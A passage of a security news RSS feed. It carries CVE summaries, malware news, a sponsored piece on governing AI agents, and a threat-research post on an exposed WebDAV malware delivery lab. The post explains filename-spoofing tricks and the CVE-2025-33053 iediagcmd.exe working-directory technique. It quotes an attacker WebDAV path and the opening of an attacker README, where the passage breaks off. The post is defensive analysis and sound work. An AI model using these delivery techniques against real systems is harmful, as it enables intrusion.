 very much. But it is still useful to know that they exist and how they work. Hopefully this episode has taught you a bit about them.</p>

<p>
References:</p>

<ol>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/paste.html" rel="noopener noreferrer" target="_blank">
Paste specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/utilities/paste.html</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/join.html" rel="noopener noreferrer" target="_blank">
Join specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/utilities/join.html</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sort.html" rel="noopener noreferrer" target="_blank">
Sort specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sort.html</li>

<li>

<a href="https://archive.org/details/a_research_unix_reader/page/n19/mode/1up" rel="noopener noreferrer" target="_blank">
A Research UNIX Reader: Fifth Edition sort manual page</a>
 https://archive.org/details/a_research_unix_reader/page/n19/mode/1up</li>

<li>

<a href="https://www.tuhs.org/cgi-bin/utree.pl?file=SysIII/usr/src/man/man1/paste.1" rel="noopener noreferrer" target="_blank">
System III paste manual page</a>
 https://www.tuhs.org/cgi-bin/utree.pl?file=SysIII/usr/src/man/man1/paste.1</li>

<li>

<a href="https://man.cat-v.org/unix_7th/1/join" rel="noopener noreferrer" target="_blank">
Seventh Edition UNIX join manual page</a>
 https://man.cat-v.org/unix_7th/1/join</li>

</ol>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4687/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2009-3720 | Apple iTunes up to 12.5 on Windows Expat memory corruption (HT207599 / Nessus ID 42380)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Apple iTunes up to 12.5 on Windows. Affected by this vulnerability is an unknown functionality of the component Expat. Performing a manipulation results in memory corruption.

This vulnerability was named CVE-2009-3720. The attack may be ini...]]></description>
<link>https://tsecurity.de/de/3682390/sicherheitsluecken/cve-2009-3720-apple-itunes-up-to-125-on-windows-expat-memory-corruption-ht207599-nessus-id-42380/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682390/sicherheitsluecken/cve-2009-3720-apple-itunes-up-to-125-on-windows-expat-memory-corruption-ht207599-nessus-id-42380/</guid>
<pubDate>Tue, 21 Jul 2026 01:38:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/apple:itunes">Apple iTunes up to 12.5</a> on Windows. Affected by this vulnerability is an unknown functionality of the component <em>Expat</em>. Performing a manipulation results in memory corruption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2009-3720">CVE-2009-3720</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-30070 | Microsoft Windows DHCP Server Service integer underflow]]></title>
<description><![CDATA[A vulnerability was found in Microsoft Windows Server 2012/Server 2012 R2/Server 2016/Server 2019. It has been declared as critical. This issue affects some unknown processing of the component DHCP Server Service. The manipulation results in integer underflow.

This vulnerability was named CVE-20...]]></description>
<link>https://tsecurity.de/de/3682388/sicherheitsluecken/cve-2024-30070-microsoft-windows-dhcp-server-service-integer-underflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682388/sicherheitsluecken/cve-2024-30070-microsoft-windows-dhcp-server-service-integer-underflow/</guid>
<pubDate>Tue, 21 Jul 2026 01:38:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows Server 2012/Server 2012 R2/Server 2016/Server 2019</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing of the component <em>DHCP Server Service</em>. The manipulation results in integer underflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2024-30070">CVE-2024-30070</a>. The attack may be performed from remote. There is no available exploit.

Applying a patch is advised to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3875 | Click Studios Passwordstate API authentication bypass by assumed-immutable data (EUVD-2022-43211)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. Impacted is an unknown function of the component API. Performing a manipulation results in authentication bypass by assumed-immutable data.

This vulnerability was name...]]></description>
<link>https://tsecurity.de/de/3682319/sicherheitsluecken/cve-2022-3875-click-studios-passwordstate-api-authentication-bypass-by-assumed-immutable-data-euvd-2022-43211/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682319/sicherheitsluecken/cve-2022-3875-click-studios-passwordstate-api-authentication-bypass-by-assumed-immutable-data-euvd-2022-43211/</guid>
<pubDate>Tue, 21 Jul 2026 00:39:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/click_studios:passwordstate">Click Studios Passwordstate and Passwordstate Browser Extension Chrome</a>. Impacted is an unknown function of the component <em>API</em>. Performing a manipulation results in authentication bypass by assumed-immutable data.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3875">CVE-2022-3875</a>. The attack may be initiated remotely. In addition, an exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63995 | Linux Kernel up to 6.12.92/6.18.34/7.0.11 Cmis cmis_fw_update_start_download out-of-bounds write (CNNVD-2026-99125109)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Linux Kernel up to 6.12.92/6.18.34/7.0.11. This impacts the function cmis_fw_update_start_download of the component Cmis. Performing a manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-63995. The attack need...]]></description>
<link>https://tsecurity.de/de/3682225/sicherheitsluecken/cve-2026-63995-linux-kernel-up-to-61292618347011-cmis-cmisfwupdatestartdownload-out-of-bounds-write-cnnvd-2026-99125109/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682225/sicherheitsluecken/cve-2026-63995-linux-kernel-up-to-61292618347011-cmis-cmisfwupdatestartdownload-out-of-bounds-write-cnnvd-2026-99125109/</guid>
<pubDate>Mon, 20 Jul 2026 23:44:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.12.92/6.18.34/7.0.11</a>. This impacts the function <code>cmis_fw_update_start_download</code> of the component <em>Cmis</em>. Performing a manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63995">CVE-2026-63995</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63429 | HeyForm up to 3.0.0-rc.8 /api/upload unrestricted upload (EUVD-2026-45986)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in HeyForm up to 3.0.0-rc.8. Affected is an unknown function of the file /api/upload. Performing a manipulation results in unrestricted upload.

This vulnerability was named CVE-2026-63429. The attack may be initiated remotely. There is no avai...]]></description>
<link>https://tsecurity.de/de/3682169/sicherheitsluecken/cve-2026-63429-heyform-up-to-300-rc8-apiupload-unrestricted-upload-euvd-2026-45986/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682169/sicherheitsluecken/cve-2026-63429-heyform-up-to-300-rc8-apiupload-unrestricted-upload-euvd-2026-45986/</guid>
<pubDate>Mon, 20 Jul 2026 22:54:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/heyform">HeyForm up to 3.0.0-rc.8</a>. Affected is an unknown function of the file <em>/api/upload</em>. Performing a manipulation results in unrestricted upload.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63429">CVE-2026-63429</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Get Borderlands 3, Risk of Rain 2 and 13 other great PC games for $15]]></title>
<description><![CDATA[The aptly-named “2K Megahits 2026 Bundle” from Humble includes 15 Steam games for $15. It’s a smattering of the publisher 2K’s biggest games of the 2010s, including BioShock Infinite, Risk of Rain 2, Borderlands 3, and XCOM: Enemy Unknown. The bundle will be available until August 7th, though the...]]></description>
<link>https://tsecurity.de/de/3682133/it-nachrichten/get-borderlands-3-risk-of-rain-2-and-13-other-great-pc-games-for-15/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682133/it-nachrichten/get-borderlands-3-risk-of-rain-2-and-13-other-great-pc-games-for-15/</guid>
<pubDate>Mon, 20 Jul 2026 22:48:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The aptly-named “2K Megahits 2026 Bundle” from Humble includes 15 Steam games for $15. It’s a smattering of the publisher 2K’s biggest games of the 2010s, including BioShock Infinite, Risk of Rain 2, Borderlands 3, and XCOM: Enemy Unknown. The bundle will be available until August 7th, though the bundle page notes that keys for […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-53421 | Apache Syncope up to 3.0.16/4.0.6/4.1.1 Connector sandbox (EUVD-2026-45958)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Apache Syncope up to 3.0.16/4.0.6/4.1.1. This affects an unknown part of the component Connector. Performing a manipulation results in sandbox issue.

This vulnerability was named CVE-2026-53421. The attack may be initiated remotely. ...]]></description>
<link>https://tsecurity.de/de/3681738/sicherheitsluecken/cve-2026-53421-apache-syncope-up-to-3016406411-connector-sandbox-euvd-2026-45958/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681738/sicherheitsluecken/cve-2026-53421-apache-syncope-up-to-3016406411-connector-sandbox-euvd-2026-45958/</guid>
<pubDate>Mon, 20 Jul 2026 19:03:16 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/apache:syncope">Apache Syncope up to 3.0.16/4.0.6/4.1.1</a>. This affects an unknown part of the component <em>Connector</em>. Performing a manipulation results in sandbox issue.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-53421">CVE-2026-53421</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[HollowGraph Malware Hides C2 and Stolen Files in Microsoft 365 Events Dated 2050]]></title>
<description><![CDATA[A newly discovered espionage implant has been using a hijacked Microsoft 365 calendar as its command channel, planting operator instructions and smuggling out stolen files as attachments on calendar events dated to the year 2050. Group-IB, which named the malware…
Read more →
The post HollowGraph...]]></description>
<link>https://tsecurity.de/de/3681689/it-security-nachrichten/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681689/it-security-nachrichten/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/</guid>
<pubDate>Mon, 20 Jul 2026 19:00:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered espionage implant has been using a hijacked Microsoft 365 calendar as its command channel, planting operator instructions and smuggling out stolen files as attachments on calendar events dated to the year 2050. Group-IB, which named the malware…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/">HollowGraph Malware Hides C2 and Stolen Files in Microsoft 365 Events Dated 2050</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI confidence just dropped 17 points in six months. That’s actually great news.]]></title>
<description><![CDATA[Presented by JumpCloudThe organizations losing confidence in AI are the ones most likely to get it right.Six months ago, 40% of IT leaders described their organizations as mature in AI deployment. Today that number is 23%. Before you read that as a setback, consider what it actually reflects.We r...]]></description>
<link>https://tsecurity.de/de/3681607/it-nachrichten/ai-confidence-just-dropped-17-points-in-six-months-thats-actually-great-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681607/it-nachrichten/ai-confidence-just-dropped-17-points-in-six-months-thats-actually-great-news/</guid>
<pubDate>Mon, 20 Jul 2026 18:03:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by JumpCloud</i></p><hr><p><b><i>The organizations losing confidence in AI are the ones most likely to get it right.</i></b></p><p>Six months ago, 40% of IT leaders described their organizations as mature in AI deployment. <a href="https://jumpcloud.com/resources/q3-2026-it-trends-report?utm_source=VentureBeat&amp;utm_medium=Contributed&amp;utm_campaign=FY26Q1_MorningBrew_AD&amp;utm_content=JulyArticle"><u>Today that number is 23%</u></a>. Before you read that as a setback, consider what it actually reflects.</p><p>We recently surveyed 800 IT leaders across the U.S. and U.K. for our Q3 2026 trends report, and the data tells a consistent story: the organizations revising their self-assessment downward are overwhelmingly the ones that have moved AI agents from pilots into production. They’re not losing faith in AI. They’re running into the problems that only show up when agents are doing real work in real systems, and they’re being honest about what they found.</p><p>That kind of honesty is harder to come by than it sounds, and it matters more than the confidence number itself.</p><h2>Deployment was the easy part</h2><p>84% of organizations plan to expand AI use in IT operations over the next 6 to 24 months, so the drop in confidence isn’t a retreat. What it reflects is a more accurate picture of what production actually requires.</p><p>In a pilot, an AI agent does one thing in a controlled setting. In production, it accesses real systems, makes decisions that affect real workflows, and operates continuously, often without a human in the loop. The governance infrastructure that entails is materially different from what it took to get the pilot working. Most organizations built enough to ship. Fewer built enough to scale.</p><p>The IT leaders revising their self-assessment are confronting questions they didn’t have to ask at the pilot stage: Can we see every agent running in our environment? Do we know what each one can access? If an agent behaved unexpectedly last week, how long would it take to find out? For most organizations, at least one of those answers is uncomfortable.</p><h2>The gap between perception and reality is where risk accumulates</h2><p>The graphic above captures the structural problem. Across confidence, governance, and autonomy, the same pattern holds: deployment is moving faster than the controls built around it.</p><p>The organizations that have closed this gap share specific characteristics. They’ve consolidated their IT environments rather than adding tools to solve each new problem, because every additional platform creates another place where agent identity, access, and accountability can go unmanaged. They treat AI agents as governed identities rather than tolerated shadow processes. And they measure what AI actually produces, not just what it deploys.</p><p>The payoff is tangible. Organizations in the top tier of our maturity model are five times more likely to report no barriers to expanding their AI agents than the average organization. They are not more cautious about AI. They are more confident in it, because they built the foundation that makes confidence earned rather than assumed.</p><h2>The governance gap has a specific shape</h2><p>The hardest problem in enterprise AI right now is not capability. It is accountability, and the data makes the specific failure point clear: non-human identity governance is the least adopted AI security practice we measured, in place at just 21% of organizations.</p><p>Non-human identities now outnumber human users in 83% of organizations, and that population is growing fast. Yet most of those identities exist without the governance structures that every human employee has as a matter of course: no formal record, no named owner, no defined scope of access, no offboarding process when their purpose expires. They keep running. They keep accessing systems. They keep accumulating permissions. We call these Zombie Agents, and they are the service account problem of the AI era, operating at machine speed and in every department.</p><p>The accountability gap is where real risk lives. When a human employee takes an action, there is an implicit accountability chain. When an autonomous agent takes an action, that chain breaks unless it has been deliberately engineered. Most organizations have not yet engineered it, and the gap between the autonomy agents are being granted and the oversight structures in place to manage them is widening every month.</p><h2>What the confidence drop is actually telling us</h2><p>When AI maturity confidence was uniformly high across the market, that was worth worrying about. It meant most organizations hadn’t yet run into the hard parts. A selective drop, concentrated among organizations actively running agents in production, means the market is developing a more accurate picture of what AI operations genuinely require.</p><p>The organizations recalibrating are doing the work that makes long-term AI adoption possible: building identity infrastructure that covers agents alongside humans and devices, unifying the environments where governance needs to apply, and measuring outcomes rather than just counting deployments. They haven’t lowered their ambitions for AI. They have raised their standards for what it means to run it responsibly.</p><p>84% of organizations plan to expand AI use over the next two years. The ones that will do it well are honest enough, right now, to admit what they haven’t yet built.</p><p><i>JumpCloud’s Q3 2026 AI Readiness Research report (n=800 IT leaders, U.S. + U.K.) is available </i><a href="https://jumpcloud.com/resources/q3-2026-it-trends-report?utm_source=VentureBeat&amp;utm_medium=Contributed&amp;utm_campaign=FY26Q1_MorningBrew_AD&amp;utm_content=JulyArticle"><i><u>here</u></i></a><i>. The report covers AI agent deployment stages, identity governance gaps, IT unification benchmarks, and budget realism across mid-market and enterprise organizations.</i></p><p><i>Rajat Bhargava is CEO and Co-founder at JumpCloud.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HollowGraph Malware Hides C2 and Stolen Files in Microsoft 365 Events Dated 2050]]></title>
<description><![CDATA[A newly discovered espionage implant has been using a hijacked Microsoft 365 calendar as its command channel, planting operator instructions and smuggling out stolen files as attachments on calendar events dated to the year 2050.

Group-IB, which named the malware HollowGraph, says the approach m...]]></description>
<link>https://tsecurity.de/de/3681555/it-security-nachrichten/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681555/it-security-nachrichten/hollowgraph-malware-hides-c2-and-stolen-files-in-microsoft-365-events-dated-2050/</guid>
<pubDate>Mon, 20 Jul 2026 17:20:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A newly discovered espionage implant has been using a hijacked Microsoft 365 calendar as its command channel, planting operator instructions and smuggling out stolen files as attachments on calendar events dated to the year 2050.

Group-IB, which named the malware HollowGraph, says the approach moves tasking and stolen data through legitimate Microsoft Graph API traffic, so the activity looks]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49788 | Microsoft Windows up to Server 2025 HTTP/2 allocation of resources]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Microsoft Windows. This affects an unknown function of the component HTTP2. The manipulation results in allocation of resources.

This vulnerability was named CVE-2026-49788. The attack may be performed from remote. There is no av...]]></description>
<link>https://tsecurity.de/de/3681402/sicherheitsluecken/cve-2026-49788-microsoft-windows-up-to-server-2025-http2-allocation-of-resources/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681402/sicherheitsluecken/cve-2026-49788-microsoft-windows-up-to-server-2025-http2-allocation-of-resources/</guid>
<pubDate>Mon, 20 Jul 2026 16:25:54 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. This affects an unknown function of the component <em>HTTP2</em>. The manipulation results in allocation of resources.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49788">CVE-2026-49788</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49184 | Microsoft Windows up to Server 2025 NTFS heap-based overflow]]></title>
<description><![CDATA[A vulnerability was found in Microsoft Windows. It has been declared as problematic. This affects an unknown part of the component NTFS. The manipulation results in heap-based buffer overflow.

This vulnerability was named CVE-2026-49184. The attack needs to be approached locally. There is no ava...]]></description>
<link>https://tsecurity.de/de/3681399/sicherheitsluecken/cve-2026-49184-microsoft-windows-up-to-server-2025-ntfs-heap-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681399/sicherheitsluecken/cve-2026-49184-microsoft-windows-up-to-server-2025-ntfs-heap-based-overflow/</guid>
<pubDate>Mon, 20 Jul 2026 16:25:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the component <em>NTFS</em>. The manipulation results in heap-based buffer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49184">CVE-2026-49184</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab]]></title>
<description><![CDATA[Executive summaryAn MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery...]]></description>
<link>https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Executive summary</h2><p><span>An MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery paths, social engineering lures, and WebDAV execution methods.</span></p><p><span>Our analysis reveals an interesting shift in adversary operations: attackers are adopting generative AI to move beyond individual exploits and operate like modern software product teams. By leveraging LLMs for rapid lure generation, detailed README documentation, and automated testing, they are significantly accelerating their development cycle.</span></p><p><span>This incident underscores the imperative of preemptive security. By unifying exposure management with detection and response, we did not just catch a single campaign; we gained visibility into the attacker’s entire delivery pipeline. Although the server hosted many malware samples, the more interesting find was the view into the attacker’s workflow. The exposed infrastructure showed how the operator tested delivery paths, packaged lures, staged payloads, and monitored delivery activity. All of it with the help of generative AI.</span></p><h2>Introduction: From MDR alert to attacker infrastructure</h2><p><span>The investigation started with an MDR alert after a user executed a file pulled from a WebDAV server using </span><span><span data-type="inlineCode">rundll32.exe</span></span><span>. Telemetry showed the WebClient service starting, followed by </span><span><span data-type="inlineCode">davclnt.dll</span></span><span> reaching out to a remote host to retrieve content.</span></p><p><span>That initial hit led us to dig deeper into the delivery setup, which is how we ended up finding an exposed directory. It quickly became clear to us that the server wasn't just hosting files, but also was used as an active malware testing and delivery hub. Alongside payloads, we found bulk-generated shortcut lures, URL-based execution tests, ClickFix pages, WebDAV initialization scripts, droppers, spoofed filenames, and operator notes.</span></p><p><span>At a high level, the 1,048 files clustered as follows:</span></p><p><span></span></p><table><colgroup data-width="1566"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Category</strong></span></p></td><td><p><span><strong>Files</strong></span></p></td><td><p><span><strong>Functions and discoveries</strong></span></p></td></tr><tr><td><p><span>LNK delivery launchers</span></p></td><td><p><span>453</span></p></td><td><p><span>Bulk-generated shortcut lures using document themes, spoofed filenames, fake icons, and multiple execution paths</span></p></td></tr><tr><td><p><span>Filename-spoofing QA</span></p></td><td><p><span>236</span></p></td><td><p><span>Tests for Unicode, double-extension, padding, and browser/Explorer rendering behavior</span></p></td></tr><tr><td><p><span>URL/LOLBin execution tests</span></p></td><td><p><span>146</span></p></td><td><p><span>Experiments with signed Windows binaries, remote working directories, and WebDAV-style execution</span></p></td></tr><tr><td><p><span>Encrypted droppers</span></p></td><td><p><span>89</span></p></td><td><p><span>Staged second-stage payloads and installer-style packages</span></p></td></tr><tr><td><p><span>Alternative execution containers</span></p></td><td><p><span>24</span></p></td><td><p><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, </span><span><span data-type="inlineCode">.cpl</span></span><span>, and related delivery containers</span></p></td></tr><tr><td><p><span>Payload stubs and spoofed executables</span></p></td><td><p><span>21</span></p></td><td><p><span>Smaller loaders, decoys, and renamed binaries</span></p></td></tr><tr><td><p><span>WebDAV scripts</span></p></td><td><p><span>17</span></p></td><td><p><span>Scripts intended to make WebDAV delivery more reliable on Windows systems</span></p></td></tr><tr><td><p><span>Builder and operator notes</span></p></td><td><p><span>10</span></p></td><td><p><span><span data-type="inlineCode">README</span></span><span> files, test reports, mappings, and generation scripts</span></p></td></tr><tr><td><p><span>ClickFix HTML lures</span></p></td><td><p><span>9</span></p></td><td><p><span>Browser-based social-engineering pages instructing users to run commands</span></p></td></tr><tr><td><p><span>Miscellaneous files</span></p></td><td><p><span>6</span></p></td><td><p><span>Included documentation for the actor’s WebDAV delivery/admin panel</span></p></td></tr></tbody></table><p><span><em>Table 1: Breakdown of files recovered from the attacker’s delivery workspace</em></span></p><h2><span>Technical analysis and observed attacker behavior</span></h2><h3>Attackers testing like a product team</h3><p><span>The open directory exposed the attacker’s payloads and testing process. The collection varied by function: some folders stored payloads, while others isolated individual delivery methods, including WebDAV, UNC paths, </span><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, Control Panel items, and trusted Windows binaries. Several directories appeared to be QA areas for testing how lures are rendered in browsers and Windows Explorer. These tests included Unicode spoofing, right-to-left override (RTLO) characters, double extensions, and padding tricks used to make executables look like documents.</span></p><p><span>The directory also contained several README files. Their structure and phrasing suggested they may have been generated with LLMs. Some folders were named </span><span><span data-type="inlineCode">testik</span></span><span> and </span><span><span data-type="inlineCode">testik2</span></span><span>, a Russian diminutive form of “test”.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" alt="testing-files-subfolders.png" caption="Figure 1: Snippet of one of many subfolders containing testing files." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="testing-files-subfolders.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" data-sys-asset-uid="bltbc6d4a9f8e6c1e40" data-sys-asset-filename="testing-files-subfolders.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Snippet of one of many subfolders containing testing files." data-sys-asset-alt="testing-files-subfolders.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Snippet of one of many subfolders containing testing files.</figcaption></div></figure><p>⠀</p><p><span>Looking at the artifacts from the open directory, we saw that the attacker was testing some specific CVEs.</span></p><p><span></span></p><table><colgroup data-width="1901"><col><col><col></colgroup><tbody><tr><td><p><span><strong>CVE</strong></span></p></td><td><p><span><strong>Observed samples</strong></span></p></td><td><p><span><strong>Short description</strong></span></p></td></tr><tr><td><p><span>CVE-2025-33053</span></p></td><td><p><span>11</span></p></td><td><p><span>Windows Internet Shortcut flaw involving external control of a file name or path, allowing code execution over a network. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-33053?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2026-21513</span></p></td><td><p><span>4</span></p></td><td><p><span>MSHTML Framework security feature bypass caused by protection-mechanism failure. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21513?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2025-24054</span></p></td><td><p><span>1</span></p></td><td><p><span>Windows NTLM spoofing issue where crafted file/path handling can trigger outbound authentication and leak NTLM material; observed tradecraft commonly involved </span><span><span data-type="inlineCode">.library-ms</span></span><span> files. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr></tbody></table><p><span><em>Table 2: CVE references observed in the exposed directory.</em></span></p><p></p><p><span>The most developed test set focused on </span><span>CVE-2025-33053,</span><span> the working-directory abuse technique reported by Check Point in its analysis of Stealth Falcon activity. It appears as though the threat was trying to reproduce or adapt the reported technique with the help from README that appears to have been generated with LLMs. At a high level, the technique abuses </span><span><span data-type="inlineCode">.url</span></span><span> shortcut behavior to launch a legitimate signed Windows binary while setting its working directory to an attacker-controlled WebDAV share. In the original reporting, the binary was </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span>, an Internet Explorer diagnostics utility. When invoked, that utility launches several child processes by name. If the working directory points to a remote WebDAV location controlled by the attacker, Windows may resolve those child process names from the remote share instead of the expected local system directory.</span></p><p><span>The README files closely mirrored this logic. They called out </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> as the preferred binary, referenced the same WebDAV working-directory pattern described in the Stealth Falcon reporting, and preserved the previously reported </span><span><span data-type="inlineCode">summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr</span></span><span> path as an example. So if you ever wonder who reads your blogs, it seems like attackers do.</span></p><p></p><pre language="c">CVE-2025-33053 (Stealth Falcon APT) - Test Setup
=====================================================

WHAT IS THIS?
This .url file abuses iediagcmd.exe to execute a file from WebDAV
WITHOUT any security warnings. Zero alerts!

HOW IT WORKS:
